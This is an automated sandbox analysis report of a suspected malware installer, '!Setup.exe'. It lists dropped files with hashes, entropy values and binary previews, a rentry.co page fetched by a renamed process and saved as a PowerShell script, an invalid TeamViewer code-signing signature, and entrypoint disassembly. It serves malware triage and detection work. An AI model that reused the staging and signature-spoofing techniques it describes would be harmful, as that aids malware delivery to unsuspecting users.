Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	109568
Entropy (8bit):	6.268600966580074
Encrypted:	false
SSDEEP:	3072:GZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3lap:GK5vPeDkjGgQaE/lS
MD5:	CD16A7A04781F568A2EC3AC1A39FED9C
SHA1:	37096520C4625AA474494B9C2A10BF31DE8B673D
SHA-256:	5863794AC1CC6542B2BEE5E8A5CF372C386DB7F2840295B902B1E3B88751A9B6
SHA-512:	6FB5658A18742FE5428A89E06E7EC0B3AE07658329CDA5FB8F0801356648D992A9C11F9E26D2468E7153665C8F3D626151256336617037B7B5F6BF3B0ED6777A
Malicious:	false
Preview:	.......................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..\|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F\|U............[............u......3........................l.....p.....t.....x.....\|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Hall

Download File

Process:	C:\Users\user\Desktop\!Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	79872
Entropy (8bit):	7.997843169471513
Encrypted:	true
SSDEEP:	1536:SohxbClN1Bzx9wpidSop7s9FJ8ejlM+wd/zJP7vxugTGMOZ1e:SoraBzPPdS/9XfwpzJP7Jugqj1e
MD5:	CC9CC6F20A1EA21EA470B504FDE0F90C
SHA1:	1E7AFADF12F7A09A68C93BA813C64C2C9B225E71
SHA-256:	2F9D2D953CCFEDDD5DEC2DF0BC5134F002F44F31715BD812F81875CDF6B550A6
SHA-512:	64C4E6ED40C401BF82ADE85189E7E862F7817965F2739FB7C93B7C2A6FD4B4959585BAF05EEB1E4A21E5F665E64709C3FA670AAE5CA1EE2B7927E7FE1E4D3824
Malicious:	false
Preview:	B....L1....=...g...........P.... @....p.,.-..NgP....k....+b...q6I.W.h.3...._z.E.....Ny.P00......4..v.OGE..N_.,.Q\_m..w.K.....Avb..QW....)>...]..E...#.>..}.......Z/...._...(b.f..F..D......\|j.87.....UT.m<....lA.n Ux......7...4...!L....Ie...nC..i.}..#....NS.;.U...\|.jO...........1.(..!.......n .."...T.t....Y.X.H......350K...wla.e...d......<.J`.{.]b......O%.S..\|r...o'Z.\|.E.>.u.......Gm.9.2o^r.Lc.9...I4.K.q.^......"L.X.`\|.1..1.B-.^G`.(FO+..#s.2..V...W.e&....8.L.,\|.?....?.+.......-..}.!(@$F./....7..(I.-v...x....z.F......ZO..t...+1......o@...s_.Ve.IUK...a. .A..Q:.e_.Kn.R[>W.@.....5...^...g.......h9.\|......%.g....+....K._(2............t.R..^.Q.BR...%....8=.Z....i<Py....c..... P_.'..h....A].wi\..Z... .K......1....a...c..1.3....lJ=...@.Rc.on...W.o.....a.R0....m*\|(o.c...\|....GT.ga.....J..e..`......S\..f...D.}..z>9.....D....H..[7> ....3............'=:G..S$qOI.?.....pCg..25.')y...P....s....;.9v.%5..n;.%-..Te...Z..&.....D..!............0b..,...Y....^..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Race

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	105472
Entropy (8bit):	5.077087329848572
Encrypted:	false
SSDEEP:	768:xhSaAwuXc/mex/SGKAGWRqA60dTcR4qYnGfAHE9AUs6:eaAwusPdKaj6iTcPAsA+
MD5:	B99AD1F5C7742F52686D2508FD00982A
SHA1:	7B0449CADAF6A2A28DBF7E65FD45A1FD12EDDB48
SHA-256:	AC58BF2BC9334DD912148161F79DC611A7326465CF959F7374F387E8AFC61B42
SHA-512:	78397576FA9CD90C7B8EA8ECE2F5B31887F5E5EB6D5A3C6FB69E4BA2554B14286142D68DB2F6DEEC4C21AD28B8148A89494154F65CE36F24EEA793EB3D96F472
Malicious:	false
Preview:	......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!...~...!...+..!...]...!...(..!...?..!...=...!...E...!...G...!......!......!......!.......!...2...!...3...!...6...!...5...!...O...!...K...!...1...!...(...!...D...!.../...!...-...!....)..!...A...!....)..!...+...!......!....)..!...&...!......!.......!...'...!.......!...%...!.......!...................................t.......................................................t.......&.......%.......@.......?............... ......" ......; ......& ....... ......3 ....... ....../ ......7 ....... ......+ ......C ..............................".......;.......&...............3.............../.......7.......................+.......C...............................".......&...............+......./...............................3.......7.......................&.......;........................~.......P....... .....................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Returning

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	895
Entropy (8bit):	3.529004704992108
Encrypted:	false
SSDEEP:	12:oLOyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1:oiyGS9PvCA433C+sCNC1
MD5:	9FA6250AC33B492A0812FC44C12A8A0C
SHA1:	B4277E0D18E4FDB16B4437F0803BB6E04438A162
SHA-256:	26A3D1D787256EDD456A7E86452AD615AD8AEA98C58F8ECEA9EE4978F62D02DE
SHA-512:	FFE0CD06A9BD86E673A0D92E3C7FB87A2E50A80B40C4716EE224264F9BE8A4E32F78E86F38E38156AD40CA8D987537CB65B9B9DDA86BFEF2FDBB9AD0CB836E52
Malicious:	false
Preview:	Ratio........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B..................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Rise

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	62464
Entropy (8bit):	6.691860814252206
Encrypted:	false
SSDEEP:	1536:82U0pkzUWBh2zGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TvYd:82UDQWf05mjccBiqXvpgb
MD5:	85667E167580AB6EE879A397EC8378D5
SHA1:	3C22100369DD7E9FC15788182A7647CC18A12EC8
SHA-256:	FAB0E8057B43711FDCF24AB3BB355B5CBC3F3D37782E598BF4925AB58E602E74
SHA-512:	398C52BEC5B244353715BC4A044415DB5A542BB9EF8C98D4C425BAEA55E2BDC0946753C5AE1775A950FB1FC2F2F3119243178D58F3230873A77086BB4FFF31D4
Malicious:	false
Preview:	f;E.u...u4IG..f..A..v...f;E.t.f;E.t.f;E.u...._^[..F.r...N.l.....t...U..QQV...E.....3..E.W....tn.....FP.P...Y..ua..3.S.]....V....+tVH...tLf9.Vt....VP.h...Y..t.k.....E.....V.....B..3...f9.Vu....M..E...[_^..2......M..B...U..Vj.....D..Y.u........F....F.....^]...U....SVW.}...3.j.A.G.[.M..@.f9X...V......e....d....;.........m.....h.............:.t...uY..:.t...uS..:.........uI..]...;Z.~L..u>..;Z..A.U.B.U...u1.M...d....@...;...H..._^[.....P0.P0.P0.P0.@0..j.h.....:...U..Q...SVW.13.....M.x>..>.+....S..s...0.u......YY..x.~..{..M.;.~.;....._^[.....s.......V..~..t..~..Wu..~.........F.._.N.^.N..y...t.Q......~..F....V...(..j.V.=C..YY..^...U..V..W.F...........}.S..........j.[9_...4..................[.N.....4..._..^]...U..QSVW...G...................u?.u..~....O...j.Y9N..........6........../...O..........._^[.......................M...U..QQV..~..t..y......]..'...E....F.....^..U....SVW..M.h..I......u..F....x........j8..B......$.....'..>B..Y..G..c....O..#......T....F..0...]..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Scout

Download File

Process:	C:\Users\user\Desktop\!Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	7.996655669830848
Encrypted:	true
SSDEEP:	1536:VklthqG33QEqywJCsrUvekJ9dVLw45uRY4hUfrR:V23AEVwEfJ9XLw45riUfrR
MD5:	76D9165FFF95E5302786C486398E284B
SHA1:	ABE552EE6A06100D96AEFC6F2AF6E189AA766227
SHA-256:	1B5A2E903DEC1BD0620E473D0DFF69761ACF5E375EAC1ED87ADF76F36F2386A3
SHA-512:	6CC547E452FDA1A60FBFB016027791788B23C3591114D7800B244ABA620717DF5A72B5CA1C98AA1355CA2C8B0E7395C04EC072DB9606540051FD99B1846FB198
Malicious:	false
Preview:	.N...9.yHi..>..d.W.Xd8.r..M...%.\|.......ig.]}>...l.T..d.7.6..$..L.......Gv5.1._x...1l..X....y....>...9.B%{...ZZ..y.K}...=..l..]..T.....o.j..t.q....B..H...\|n).KY.5..U.u.B..!.Z......z(\|.B.zz8..N.M....0)FF[R.32A..n...W/........!..+Q..{S.:07:.c\|.\NK..R.!.v_...Ye.J.lPg..=mju....".`.....X.\|.)Np..p..S......Q.`.OT..A..&....>........,..'......4$.x.c\|.].D..=..&+#D...~g...%q....V..........v`..E.~.q..}}r...wi...iB uG..T..[.\|%.#-.XG^....ED.....u:.vOP.:.....`>{.:....+q..}.....pz..Ct..6-.I...a].D.c.....V.0...=}sQ.ig..!A...."k.f.D..G....&.&.Q..+.M.....`.O....s...._Q..j.x...9.ld.....G9......<W.[.Bi...6....+I+W....0R6d.jh?..qe.......a..k.".....__....$..3..<........C}..l...a..=Xf..?.2"..V..d....+02..s.s(L. 7...W..5Yj)bZ.T..S..Q........D.7IzZ~f7.uy.9k+.....>.^...}%....;.Vc.!.-.0..T...j..E.....HP;..-=H.Z...f.J.Z...i?...l..?A..i.a.`LFo.w...JU..a .6.l.O....G.........Y..K.....X..+..D...A$....^.`..).2j,...+.-$.}.G....H.w.<.. ....a qR.....?.[..S.%JE.6

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Soccer

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	144384
Entropy (8bit):	6.466063523256831
Encrypted:	false
SSDEEP:	3072:PDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbI:GO5bLezWWt/Dd314V14ZgP0JaAOz04pC
MD5:	57B6E79E7402D37A0B83CFF2DB1D0273
SHA1:	8805DF3CABF590F92B2ECB7EFAE60D82F14F0B6F
SHA-256:	8DF20B2B819AA0C6E36877BA7063FED41274B988C46C28EC7E4B3C72584EC2E7
SHA-512:	49EAFE0D09F850C52006C3DF4DD58E2D4CE1D6AA22AA7A378D6345AB6FE7C92987E134E4C486DEF75E6B0219D867AE1229AA828440C5624EF8C93C7CC1E79DAF
Malicious:	false
Preview:	...Pj..t$\Q....I...tF...@..\|8...L8.t..I8.A......\|8...L8.t..I8.A...\|$.........t$.....I......C..L$$3.SSQS.L$0Q.t$<.H.....HP.t$0....I...t(...@..L8.8\8.t..I8.I...L8.8\8.t..I8.Y....M..D$(P..M....S.t$(.H....(....t$..5..I...9\$.t..t$...L$P......L$0.%....L$@......D$,.(.u.j.P.8...t$0..8....._^3.[..]...U......LSVW.}...h..I....B....L$8.....L$(.....L$H.....E..@..0........N..........A..B..A..B..A..B....D$XP.D$<P.D$PP.....D$(.......D$<.A..D$@.A..D$D.A....D$0P.D$,P......u1...@..\|....L..t..I8.A......\|....L..t..I8.A...l...3..D$.9D$<t].D$.P.t$..t$@..$.I...t@j.P...H.........H..\|....D..t..@8.@......\|....D..t..@8.@........L$....L$..D$.P.D$$.....P3.P.t$TQ....I...tRj.P...H....O....\|$..t..t$.....I....@..\|....L..t..I8.A......\|....L..t..I83..A......E..@..p....K....F..L$.Q3.L$ RQR.0.t$$.. .I...j.^..1...t6j.P.......H..\|....D..t..@8.H...\|....D..t..@8.@.......3.P.t$ ....D$.........j.Z;............h...;..........t`..........E..D$......@..p........D$.P.D$$P3.PP.F..0.t$$.. .I..]...t$ .\|$$.A...j.X

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Throat

Download File

Process:	C:\Users\user\Desktop\!Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	71680
Entropy (8bit):	7.997185886941614
Encrypted:	true
SSDEEP:	1536:bvgT0gwThL3g9hMNG6HNnBAcmSJU3VXkxf3nZ9rY47K0qMLE9S7f:bvgABhL32wHNn6cBgX+brY47K0qqtf
MD5:	34BE2CF79F42494DB963EC85DA206D2E
SHA1:	2713983B0B393CFF8E07630B1ABC107FE90BDC5B
SHA-256:	7CFB013FACCD6086F660D5B46712EBACABF2A160A26E453A7B83D83412A16A11
SHA-512:	47CD4E47A69059235607B95342E069CCD7C8E41F7D6D9E1DDC9BF5F93BC8C7A064A49EDC26ADC41CCD3F24B5515E965D3E9CAAC391D345D3D5209C6ADEDD61CB
Malicious:	false
Preview:	E#....p.C...d.....7%y.~0~.\|...1....o.\|.....}(..7...3.....8.0..\|.....j$.e.....p......jn.W..U.hJ.Ei...}...B.Y.F.kt.E...n.H@...O.G8...x.].^b.P.3....J..V.J...;.~.....0;.....`\"G...@;..t...Y........u.8.sY..d.b...1b..p...O....M KL3.TqH-J.k......\..f..%\|p.k...-1._.M@ll.l..Z....W..?...w......V..t..2I.......V.Z....H.NPa.$.e7OE.1.._...^..........N.... (.PN....33.7......<"E!.E..........."Q..;..C../............_m...H.j...\...O0&,Z.B..)..).H.8=.E.,..1...HCtGG.BC...3.="./...4z....r..q.kQx.DE.......u2;R....e.......%.t...v.B.X..8}... ..D.....g..H.........D...K.C..RPPgbtX....A.%...E..s....8..MG(.....v..g.v,..J.v9.)cv.....y.n...N.n\|...xE..&.%oz....W....E'/Y..............^...., V...5.k...dj.......}.9xP}\.R..S.q....L.t=.<...b. D...Q...<..',.v.I.....,.Cjq.....]f1.m.+..@...i_ {..J..T.:U....t>.&}..G..@.9....G.FH.K.Y...K(.".'#.......$.........urd.o}..E..;..5.p...s..@../.w#...my......@....;......e...1.8.p..X..9.v.Q...I...O...._...d..&...N..{.hB....g....o...x.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\War

Download File

Process:	C:\Users\user\Desktop\!Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	34424
Entropy (8bit):	7.994339551631228
Encrypted:	true
SSDEEP:	768:VCFeeq+5DGzH8CfNr7GfSLnANmqrfy10Uy/hrMBohg9:VCFeeQBlr7GKzaXy0UyZrK
MD5:	F0067E491667E285C6AA36CABB0934F0
SHA1:	05F07BC57272ACEA6794F92726B6B05AC4BF41EA
SHA-256:	7C27FA3805B5877F74A80274B3ACCFF8041CFCB5C8FF930DE5B93F49569A9C8E
SHA-512:	FFDAD8684222F1E957A8E64DF94EE6DEA74BE948E8ABA9C759B5995B8337A9C1F363C1B098D32C393DC69D7470C9BA2E748E4D057F3FE89E6F4C99B02DE2F9AF
Malicious:	false
Preview:	.<]......].....F.`..E........!......Fz....`Ey.Z......c.........]...@...8..(..[.(..iR.G..,...0.d......[...D32...x.=..7y;.=#..3{.:.Af.F.8,C:..b....[..<4....P..P....a.9?.l1D..A...JU8...T.kYXY.....U2...0...A..7<......;...jS.......}9_.....k.n....e.....Z...t<V.....Z...y...\|1i.,........d.3...YN..[x. .y-.i.z.D........3..Q.......j..BH....C.....)zyg"..Y..[wG+..+..''`.9..5:Y{r.8H5..4.rXuC#F......g..._-.Z(.....,.>..P]..bD..2s........wU......5......5i..Xg..\%..cr5e..+...(=./...-Z.y..M.@..@..;..9.Z:..j.......ju..e;..#......X...t.S....5......Iva...!...q..{..N.H..s...kYp...h9...>f.{%.}....\|.....b}]...O...Rcm.K. q. 51...-.?....>.{.:.($...)E......h../f.R1...`.u.m`..o....=YmAV...mR(!.$.j$...9.~.C5.CZ...h. 4..r.."{.U..}Hb.s)._..q.j.3..Y.VI:.....g.}...^.vY#....#.......r..)........9nnQ.-.'F....._.....Z.6......GN...[..E.z.R..g...D..z...........9W...(c\g.E.=..*5L..Uq....O0.....54.3....U3D..D..{...c..%......J.Rf...t.....Eg.....8\|.Y.n.j#."..d.w....u..d.Y..S>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Writing

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	7390
Entropy (8bit):	7.597721493375944
Encrypted:	false
SSDEEP:	192:bH6N8VEVFJ84kcGNq4/C+Q3ISVSWMZMQ3rw:brVEVFJ8ZcGwGBk7/UMQ3rw
MD5:	117FE1670C955271C9D468192301A43F
SHA1:	46E5D4E2284C95B30D8D5C8C506A5376987B70A6
SHA-256:	4C4FD142141A03A04B927A31F365DFB0ACD6F972340B109430AF367EAA2856ED
SHA-512:	1BECFB8DDE3672C2A6FBD33BE641CD0E15852365AD2DEED41700F3C441BE90F691B564AE947813A04D19665E9B39AC17F73B1A7EFB54CE8B4821B0A25D2DCEF9
Malicious:	false
Preview:	d...H}.)..f..+....";Y.}..#....). .%\|.X.[.....tgo..!sN....9v.\...\|.)F.....1.I4V(F.......x.t.2.............T.Ia.S..&zp2....5..U..ye.{.$.;..!.f...E...1..70..3...0j0Z1.0...U....BE1.0...U....GlobalSign nv-sa100...U...'GlobalSign CodeSigning CA - SHA256 - G3..8.Hn...04.J0...`.H.e.........0....H......1...+.....7...0...+.....7...1.0...+.....7...0/...H......1". .g.6..l....#..t.X..n\|$>.......0^..+.....7...1P0N.". .A.u.t.o.I.t. .v.3. .S.c.r.i.p.t.(.&https://www.autoitscript.com/autoit3/ 0....H............>./.f..m..6.5.f..V..6.......E.]....Q...).S.......A20......\|.aH\|A..B;.L:..,...<.d>m._.Ij..Fx...2........~,.P.......u.um..S..7c.]..\f....e{W.XM&...b.=4..)....C.O).@.....&OX.29\.K.bG..;c-f..:.. .K..u.....O.riW....u5.GU[..zoH.e..i.....0RZ....5....0.....+.....7...1...0......H..........0......1.0...`.H.e....0....*.H..............0.......+.....2..010...`.H.e....... .s....Y....8.z..^.....&.....2...M:BiRb.Sanz...M.....20220227153015Z0.....W.U0S1.0...U....BE1.0...U..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.6599547231656377
Encrypted:	false
SSDEEP:	3:NlllulRlltl:NllU
MD5:	2AAC5546A51052C82C51A111418615EB
SHA1:	14CFBEF3B3D238893C68F1BD6FE985DACF1953F1
SHA-256:	DBBA7151765EDB3661C0B1AD08037C0BDDC43227D2F2E8DDAC33C4A1E7C4151F
SHA-512:	1273F4B0365E213134E7FBC3BE45CAC33CB32AB6CED85479905C702F0429A0491A5E9C878E5FEFFA05BB0D1AA7F704949D13DD1DA9FCEB93665F1CC110FB24B8
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
File Type:	HTML document, ASCII text, with very long lines (945)
Category:	dropped
Size (bytes):	5659
Entropy (8bit):	5.039280615096417
Encrypted:	false
SSDEEP:	96:5puA5jKEcXrj7uDQgzds4x3pBxu04nx/ICu:5p9pcXr2DFze4x3pBIHnx/ju
MD5:	B417EB3353C5375A9FD8CDE2774CFA7F
SHA1:	ABF9585C8DB4CE18762C52584D40B065EB813C8A
SHA-256:	8C20C24FCBA84BB4950B653CB00CDD8AC801CE4C27CFA4CBD42E690D6B356AEB
SHA-512:	C2176B85CC373D271BD7A1F49A64B36034987927634E4D8B84105D79788C5EC47FAEBBF46CE8D2C0E33D99AEAFF07B2FA078BA9FFB8514B8EC6B8030E85F055B
Malicious:	true
Preview:	<!DOCTYPE html>..<html>...<head>. <meta charset="utf-8">. .<title>What</title>.<link rel="canonical" href="https://rentry.co/what" />.. .<meta name="description" content="Rentry.co is a markdown paste service with preview, custom urls and editing. Fast, simple and free.">.<meta name="keywords" content="paste, markdown, publishing, markdown paste service, markdown from command line">..<meta name="twitter:card" content="summary" />.<meta name="twitter:description" content="Markdown paste service with preview, custom urls and editing." />.<meta name="twitter:title" content="Rentry.co - Markdown Paste Service" />.<meta name="twitter:site" content="@rentry_co" />.<meta name="twitter:image" content="https://rentry.co/static/icons/512.png" />..<meta property="og:url" content="https://rentry.co/" />.<meta property="og:title" content="Rentry.co - Markdown Paste Service" />.<meta property="og:description" content="Markdown paste service with preview, custom urls and editing." />.<meta p

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ebu4vle.su5.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s3esdpm5.oje.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.895386354455606
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	!Setup.exe
File size:	14'692'191 bytes
MD5:	cb8f02134e7a9e082e0d9bf4c988b202
SHA1:	c4a32f3385e1b91d135d2f713779299bdb6d0ab0
SHA256:	2b5fdba3647700d3dde718e3b43fde8c12f3425d0ab768d446450deeb1a3de33
SHA512:	e1bb2da52c92c2834a4225574adaccf7d960b6be9d846578521d3204b465710cb10dd184859a36f004c4acd761844741cab84a363682a42a4d7e17b6cd6a6144
SSDEEP:	24576:oRVUf5F4PCxULgB/88cv15mKLTanYE2caHvdzzfn2ex:d5gcB/88cDPLT0i9f2ex
TLSH:	64E6C43033FCD43DD95608C1EA91B6D3A667E6E1B483506CA2588EED31B350DBE5CB68
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....

File Icon


Icon Hash:	e899b89cfa1a7810

Static PE Info

General

Entrypoint:	0x4038af
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	04/05/2023 01:00:00 07/05/2026 00:59:59
Subject Chain	CN=TeamViewer Germany GmbH, O=TeamViewer Germany GmbH, L=G\xf6ppingen, S=Baden-W\xfcrttemberg, C=DE
Version:	3
Thumbprint MD5:	0D637B42FF0AB3019673C4243305BD25
Thumbprint SHA-1:	777A41024CF413CCB49B3434565545C0D78D80E9
Thumbprint SHA-256:	3A0A9BD3CBF08E350DACBFCB54C53F00113D929DAD01AF4C9D5BFE37ACF9F352
Serial:	062EE3FD7CDC52097C1DA6AFA87C745E

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 0040A268h
mov dword ptr [esp+14h], ebp
call dword ptr [00409030h]
push 00008001h
call dword ptr [004090B4h]
push ebp
call dword ptr [004092C0h]
push 00000008h
mov dword ptr [0047EB98h], eax
call 00007FDA888AFD4Bh
push ebp
push 000002B4h
mov dword ptr [0047EAB0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 0040A264h
call dword ptr [00409184h]
push 0040A24Ch
push 00476AA0h
call 00007FDA888AFA2Dh
call dword ptr [004090B0h]
push eax
mov edi, 004CF0A0h
push edi
call 00007FDA888AFA1Bh
push ebp
call dword ptr [00409134h]
cmp word ptr [004CF0A0h], 0022h
mov dword ptr [0047EAB8h], eax
mov eax, edi
jne 00007FDA888AD31Ah
push 00000022h
pop esi
mov eax, 004CF0A2h
push esi
push eax
call 00007FDA888AF6F1h
push eax
call dword ptr [00409260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007FDA888AD3A3h
push 00000020h
pop ebx
cmp ax, bx
jne 00007FDA888AD31Ah
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xac40	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x100000	0x66e2	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xe0002f	0x2f30
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x86000	0x994	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x728c	0x7400	419d4e1be1ac35a5db9c47f553b27cea	False	0.6566540948275862	data	6.499708590628113	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x2b6e	0x2c00	cca1ca3fbf99570f6de9b43ce767f368	False	0.3678977272727273	data	4.497932535153822	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc000	0x72b9c	0x200	77f0839f8ebea31040e462523e1c770e	False	0.279296875	data	1.8049406284608531	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x7f000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x100000	0x66e2	0x6800	aced79e902ae27a028330595bd1eb48c	False	0.65478515625	data	6.072590767394516	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
